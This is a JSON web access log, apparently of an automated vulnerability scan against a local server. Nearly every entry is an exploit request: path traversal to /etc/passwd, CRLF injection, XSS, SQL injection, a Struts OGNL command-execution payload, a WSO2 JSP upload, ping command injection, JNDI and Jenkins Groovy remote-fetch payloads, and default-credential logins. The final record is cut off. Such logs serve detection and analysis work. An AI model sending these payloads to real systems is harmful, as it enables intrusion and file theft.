+{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cas/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22username\x22\x0D\x0A\x0D\x0Aadmin\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC\x0D\x0AContent-Disposition: form-data; name=\x22password\x22\x0D\x0A\x0D\x0Apanabit\x0D\x0A------WebKitFormBoundaryAjZMsILtbrBp8VbC--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/userverify.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.078","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"http://127.0.0.1/login/login.htm", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hybris/hmc/hybris HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.076","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.do HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.038","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%3F%0DSet-Cookie%3Acrlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.075","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /uir//etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.090","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22admin\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.113","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/jolokia/read%3Csvg%20onload=alert%28document.domain%29%3E?mimeType=text/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"username=dd' or extractvalue(0x0a,concat(0x0a,810663301*872821376))#&password=dd&submit=+%B5%C7+%C2%BC+\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /index.php?m=member&f=login_save HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?layout=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.065","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /user/scripts/login_par.js HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-----------------------------5825462663702204104870787337\x0D\x0AContent-Disposition: form-data; name=\x22employee_ID\x22; filename=\x22poc.php\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------5825462663702204104870787337--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /dashboard/uploadID.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.089","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.054","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/resolution HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.jenkins.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%0ASet-Cookie%3Acrlfinjection/.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /duomiphp/ajax.php?action=addfav&id=1&uid=1%20and%20extractvalue(1,concat_ws(1,1,md5(9999999999))) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22read\x22,\x0D\x0A \x22mbean\x22:\x22java.lang:type=Memory\x22,\x0D\x0A \x22target\x22:{\x0D\x0A \x22url\x22:\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\x22\x0D\x0A }\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /jolokia/read/getDiagnosticOptions HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.076","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.043","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /?name=%25%7B%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27cat%20/etc/passwd%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27/c%27%2C%23cmd%7D%3A%7B%27/bin/bash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%40org.apache.commons.io.IOUtils%40toString%28%23process.getInputStream%28%29%29%29%7D HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_ID\x22\x0D\x0A\x0D\x0A1\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_FileUploadDir\x22\x0D\x0A\x0D\x0A/wp-content/uploads/simple-file-list/\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Timestamp\x22\x0D\x0A\x0D\x0A1587258885\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22eeSFL_Token\x22\x0D\x0A\x0D\x0Aba288252629a5399759b6fde1e205bc2\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22nuclei.png\x22\x0D\x0AContent-Type: image/png\x0D\x0A\x0D\x0A\x0D\x0A--6985fa39c0698d07f6d418b37388e1b2--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.083","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?post_type=post&s=%22%3E%3Cscript%3Ealert(/297MTmVFos9SxYXESCGwJXnWfL6/)%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/297mtpzu77ridbidigfryor414y.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /PDC/ajaxreq.php?PARAM=127.0.0.1+-c+0%3B+cat+%2Fetc%2Fpasswd&DIAGNOSIS=PING HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.045","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.travis.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.049","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&callback=%0D%0ASet-Cookie:crlfinjection=crlfinjection&checkout_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&content=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continue=%0D%0ASet-Cookie:crlfinjection=crlfinjection&continueTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&counturl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&data=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dest_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&dir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&document=%0D%0ASet-Cookie:crlfinjection=crlfinjection&domain=%0D%0ASet-Cookie:crlfinjection=crlfinjection&done=%0D%0ASet-Cookie:crlfinjection=crlfinjection&download=%0D%0ASet-Cookie:crlfinjection=crlfinjection&feed=%0D%0ASet-Cookie:crlfinjection=crlfinjection&file=%0D%0ASet-Cookie:crlfinjection=crlfinjection&host=%0D%0ASet-Cookie:crlfinjection=crlfinjection&html=%0D%0ASet-Cookie:crlfinjection=crlfinjection&http=%0D%0ASet-Cookie:crlfinjection=crlfinjection&https=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&image_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&imageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&include=%0D%0ASet-Cookie:crlfinjection=crlfinjection&media=%0D%0ASet-Cookie:crlfinjection=crlfinjection&navigation=%0D%0ASet-Cookie:crlfinjection=crlfinjection&next=%0D%0ASet-Cookie:crlfinjection=crlfinjection&open=%0D%0ASet-Cookie:crlfinjection=crlfinjection&out=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page=%0D%0ASet-Cookie:crlfinjection=crlfinjection&page_url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&pageurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&picture=%0D%0ASet-Cookie:crlfinjection=crlfinjection&port=%0D%0ASet-Cookie:crlfinjection=crlfinjection&proxy=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redir=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirectUri&redirectUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&reference=%0D%0ASet-Cookie:crlfinjection=crlfinjection&referrer=%0D%0ASet-Cookie:crlfinjection=crlfinjection&req=%0D%0ASet-Cookie:crlfinjection=crlfinjection&request=%0D%0ASet-Cookie:crlfinjection=crlfinjection&retUrl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return=%0D%0ASet-Cookie:crlfinjection=crlfinjection&returnTo=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_path=%0D%0ASet-Cookie:crlfinjection=crlfinjection&return_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&rurl=%0D%0ASet-Cookie:crlfinjection=crlfinjection&show=%0D%0ASet-Cookie:crlfinjection=crlfinjection&site=%0D%0ASet-Cookie:crlfinjection=crlfinjection&source=%0D%0ASet-Cookie:crlfinjection=crlfinjection&src=%0D%0ASet-Cookie:crlfinjection=crlfinjection&target=%0D%0ASet-Cookie:crlfinjection=crlfinjection&to=%0D%0ASet-Cookie:crlfinjection=crlfinjection&uri=%0D%0ASet-Cookie:crlfinjection=crlfinjection&url=%0D%0ASet-Cookie:crlfinjection=crlfinjection&val=%0D%0ASet-Cookie:crlfinjection=crlfinjection&validate=%0D%0ASet-Cookie:crlfinjection=crlfinjection&view=%0D%0ASet-Cookie:crlfinjection=crlfinjection&window=%0D%0ASet-Cookie:crlfinjection=crlfinjection&redirect_to=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.048","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /_next/static/../server/pages-manifest.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.055","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /ui_base/js/..%2f..%2f..%2f..%2fsettings.js HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.002","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.052","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hue/accounts/login?next=/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /pentaho/Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /routes/error_log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.058","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.042","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?Test=%0D%0ASet-Cookie:crlfinjection=crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.044","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/home HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.047","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "13/May/2022:16:34:41 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /concerto/Login?goto=Central HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.040","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": 